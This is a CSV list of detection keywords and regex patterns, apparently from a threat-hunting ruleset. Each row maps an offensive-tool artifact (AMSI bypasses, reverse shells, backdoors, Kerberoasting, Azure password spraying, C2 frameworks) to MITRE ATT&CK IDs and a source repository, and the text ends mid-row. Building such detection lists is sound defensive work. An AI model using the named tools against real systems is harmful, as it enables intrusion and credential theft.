"*InvisiShellProfiler.dll*",".{0,1000}InvisiShellProfiler\.dll.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.h*",".{0,1000}InvisiShellProfiler\.h.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.pdb*",".{0,1000}InvisiShellProfiler\.pdb.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*InvisiShellProfiler.vcxproj*",".{0,1000}InvisiShellProfiler\.vcxproj.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*invoke obfuscation*",".{0,1000}invoke\sobfuscation.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*invoke* -Action command -Execute * -Session*",".{0,1000}invoke.{0,1000}\s\-Action\scommand\s\-Execute\s.{0,1000}\s\-Session.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","13","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z" "*Invoke-*WDigestDowngrade.ps1*",".{0,1000}Invoke\-.{0,1000}WDigestDowngrade\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*invoke_obfuscation.py*",".{0,1000}invoke_obfuscation\.py.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*invoke_sessiongopher.py*",".{0,1000}invoke_sessiongopher\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*Invoke-AccessCheck -PSRemoting*",".{0,1000}Invoke\-AccessCheck\s\-PSRemoting.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Invoke-AccessCheck -SMB*",".{0,1000}Invoke\-AccessCheck\s\-SMB.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Invoke-AccessCheck.ps1*",".{0,1000}Invoke\-AccessCheck\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Invoke-AccessCheckForAllGroups*",".{0,1000}Invoke\-AccessCheckForAllGroups.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForAllServicePrincipals*",".{0,1000}Invoke\-AccessCheckForAllServicePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForAllUsers*",".{0,1000}Invoke\-AccessCheckForAllUsers.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForCurrentUser*",".{0,1000}Invoke\-AccessCheckForCurrentUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForCurrentUser*",".{0,1000}Invoke\-AccessCheckForCurrentUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForGroup*",".{0,1000}Invoke\-AccessCheckForGroup.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForServicePrincipal*",".{0,1000}Invoke\-AccessCheckForServicePrincipal.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AccessCheckForUser*",".{0,1000}Invoke\-AccessCheckForUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-ACLcsvFileAnalysis*",".{0,1000}Invoke\-ACLcsvFileAnalysis.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Invoke-ACLPwn*",".{0,1000}Invoke\-ACLPwn.{0,1000}","offensive_tool_keyword","Invoke-ACLpwn","Invoke-ACLpwn is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured.","T1098 - T1208 - T1484 - T1486 - T1059","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/Invoke-ACLPwn","1","0","N/A","N/A","6","505","87","2022-09-15T15:13:00Z","2018-04-26T09:21:27Z" "*Invoke-ACLScanner * -Filter *",".{0,1000}Invoke\-ACLScanner\s.{0,1000}\s\-Filter\s.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Invoke-ACLScanner * -Name *",".{0,1000}Invoke\-ACLScanner\s.{0,1000}\s\-Name\s.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*invoke-aclscanner*",".{0,1000}invoke\-aclscanner.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-ACLScanner*",".{0,1000}Invoke\-ACLScanner.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-ADCSTemplateRecon*",".{0,1000}Invoke\-ADCSTemplateRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-Adeleginator*",".{0,1000}Invoke\-Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-ADSBackdoor.json*",".{0,1000}Invoke\-ADSBackdoor\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-AirstrikeAttackCheck*",".{0,1000}Invoke\-AirstrikeAttackCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-AirstrikeAttackCheck*",".{0,1000}Invoke\-AirstrikeAttackCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-AllAccessChecks*",".{0,1000}Invoke\-AllAccessChecks.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Invoke-AllChecks*",".{0,1000}Invoke\-AllChecks.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Check for vulnerable programs and configs","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-APIConnectionHijack.ps1*",".{0,1000}Invoke\-APIConnectionHijack\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-ApplicationsOnStartupCheck*",".{0,1000}Invoke\-ApplicationsOnStartupCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ApplicationsOnStartupCheck*",".{0,1000}Invoke\-ApplicationsOnStartupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ARPScan*",".{0,1000}Invoke\-ARPScan.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ARPScan.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*invoke-arpscan*",".{0,1000}invoke\-arpscan.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-ARPScan.ps1*",".{0,1000}Invoke\-ARPScan\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ASREPRoast*",".{0,1000}Invoke\-ASREPRoast.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","187","55","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*InvokeAssembly.x64.dll*",".{0,1000}InvokeAssembly\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Invoke-AutoKerberoast*",".{0,1000}Invoke\-AutoKerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" "*Invoke-AutoOAuthFlow*",".{0,1000}Invoke\-AutoOAuthFlow.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Automates the OAuth flow completion to obtain access and refresh keys when a user grants consent to an app registration","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-AutoTokenRefresh*access_token.txt*",".{0,1000}Invoke\-AutoTokenRefresh.{0,1000}access_token\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-AzElevatedAccessToggle*",".{0,1000}Invoke\-AzElevatedAccessToggle.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-AzRESTBastionShareableLink*",".{0,1000}Invoke\-AzRESTBastionShareableLink.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-AzureEnum.ps1*",".{0,1000}Invoke\-AzureEnum\.ps1.{0,1000}","offensive_tool_keyword","Invoke-AzureEnum","This cmdlet is used to perform users enumeration against Azure","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1","1","1","N/A","N/A","5","460","88","2023-12-08T15:50:39Z","2019-11-20T22:07:50Z" "*Invoke-AzurePasswordSpray*",".{0,1000}Invoke\-AzurePasswordSpray.{0,1000}","offensive_tool_keyword","Invoke-AzurePasswordSpray","This cmdlet is used to perform a password spray attack against Azure accounts using legacy Basic Authentication","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1","1","1","N/A","N/A","5","460","88","2023-12-08T15:50:39Z","2019-11-20T22:07:50Z" "*Invoke-AzureRmVMBulkCMD.ps1*",".{0,1000}Invoke\-AzureRmVMBulkCMD\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - 